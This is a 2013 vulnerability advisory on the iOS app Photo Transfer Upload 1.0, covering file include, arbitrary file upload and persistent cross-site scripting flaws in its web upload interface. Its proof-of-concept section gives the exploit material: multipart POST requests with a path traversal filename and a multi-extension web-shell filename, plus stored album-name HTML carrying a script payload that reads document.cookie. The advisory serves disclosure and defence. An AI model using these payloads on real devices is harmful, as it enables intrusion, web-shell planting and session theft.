Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities

Title:
======
Photo Transfer Upload v1.0 iOS - Multiple Vulnerabilities


Date:
=====
2013-08-16


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1047


VL-ID:
=====
1047


Common Vulnerability Scoring System:
====================================
8.6


Introduction:
=============
Photo Transfer Access and transfer all your photos between your iPhone/iPad and PC/Mac without 3rd party transfer utilities.
It can easily access your photo libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same wifi 
network, very easy to use!

- Support drag & drop upload, easy to use
- Transfer multiple photos and videos at once
- Download photos and videos as zip archives
- Crate new album
- Password protection for the web access

( Copy of the Homepage: https://itunes.apple.com/us/app/photo-transfer-upload-download/id672205608 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-08-16:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Photo Transfer Upload - Mobile Application 1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A local file/path include web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when processing to upload files with manipulated filename values in the POST method request. 
The attacker can inject local path or files to request context and compromise the mobile device or web service. The validation has a bad side 
effect which impacts the risk to combine the attack with persistent injected script code.

Exploitation of the local file include web vulnerability requires no user interaction or privilege application user account with password. 
Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application.

Vulnerable Application(s):
				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] Upload (Files) - (http://localhost)

Vulnerable Parameter(s):
				[+] filename 

Affected Module(s):
				[+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.

The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload 
a php or js web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and 
extension image.jpg.js.php.jpg . The attacker needs to open the file in the web application and deletes the .jpg file extension to access the 
picture with elevated access rights.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Vulnerable Application(s):
				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] Upload (Files) - (http://localhost)

Vulnerable Parameter(s):
				[+] filename (multiple extensions)

Affected Module(s):
				[+] Index File Dir Listing


1.3
A persistent input validation web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application side).

The vulnerability is located in the `Add Photo Album` module of the web-server interface (http://localhost) when processing to 
request via POST method manipulated `album names`. The album name will be changed to the path value without secure filter, 
encode or parse mechanism. The injected script code will be executed in the main index file dir folder listing of the mobile application.

Exploitation of the persistent web vulnerability requires low user interaction and no privilege application user account with a password. 
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, 
persistent phishing or persistent module context manipulation.

Vulnerable Application(s):
				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] Add Photo Album

Vulnerable Parameter(s):
				[+] Album Name

Affected Module(s):
				[+] Index Listing
				[+] Sub Category Listing


Proof of Concept:
=================
1.1
The file/path include web vulnerability can be exploited by remote attackers without user interaction or 
privilege application user account. For demonstration or reproduce ...


--- POST --- (Upload #1)
POSTDATA =-----------------------------144252594127308
Content-Disposition: form-data; name="params"

name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
-----------------------------144252594127308
Content-Disposition: form-data; name="newfile"; filename="><;../../var/mobile/x[FILE INCLUDE VULNERABILITY]"
Content-Type: image/png
‰PNG
-
--- POST --- (LIST INDEX #1 #2)
POSTDATA={"url":"ALL"}


Note: After the file/path include the attacker can open the index module or sub category to execute the request.



1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or 
privilege application user account. For demonstration or reproduce ...


--- POST --- (Upload #2)
POSTDATA =-----------------------------144252594127308
Content-Disposition: form-data; name="params"

name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
-----------------------------144252594127308
Content-Disposition: form-data; name="newfile"; filename="pentester.jpg.html.js.php.asp.xml.jpg"
Content-Type: image/png
‰PNG

--- POST --- (LIST INDEX #1 #2)
POSTDATA={"url":"ALL"}

Note: After the file upload the attacker deletes the .jpg extension to access the injected webshell.



1.3
The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user 
account and also without user interaction. For demonstration or reproduce ...


PoC:  Index - Album Name

<ul class="thumbnails" id="albums"><li class="album_warp"><a href="http://localhost/album.html?name=Camera%20Roll&
url=assets-library://group/?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C" class="thumbnail">
<img src="Photo%20Transfer_files/-1886868417.PNG" class="album_image"><h5 class="album_title">Camera Roll</h5>
<p class="album_desc">11 Photos</p></a></li><li class="album_warp">
<a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&
url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail"><img src="Photo%20Transfer_files/placeholder.png" 
class="album_image"></a><h5 class="album_title">
<a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&
url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">>"</a><div style="2</h5>
<p class=" album_desc"=""><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20
style=%222&url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">0 Photos<p></p></a></div></h5></li>
<li class="album_warp"><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%221&
url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail"><img src="Photo%20Transfer_files/placeholder.png" 
class="album_image"></a><h5 class="album_title"><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail">>"</a>
<div style="1</h5><p class=" album_desc"=""><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail">0 Photos<p>
</p></a></div></h5></li></ul>


Solution:
=========
The vulnerability can be patched by a secure encoding or escape  when processing to add via POST method request folders with manipulated names.


Risk:
=====
The security risk of the persistent input validation web vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com